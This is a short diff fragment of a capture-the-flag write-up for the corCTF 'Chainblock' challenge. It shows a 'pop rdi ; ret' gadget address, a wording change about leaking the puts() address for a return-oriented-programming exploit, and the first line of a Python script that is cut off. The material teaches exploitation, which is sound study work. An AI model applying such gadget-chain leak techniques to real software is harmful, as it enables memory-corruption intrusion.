0xM4hm0ud/CTF-Writeups/corCTF/Chainblock/README.md

 ```
 0x0000000000401493 : pop rdi ; ret
 ```
-So now we can make the exploit to leak the libc address:
+So now we can make the exploit to leak the puts() address:

 ```py
 #!/usr/bin/env python3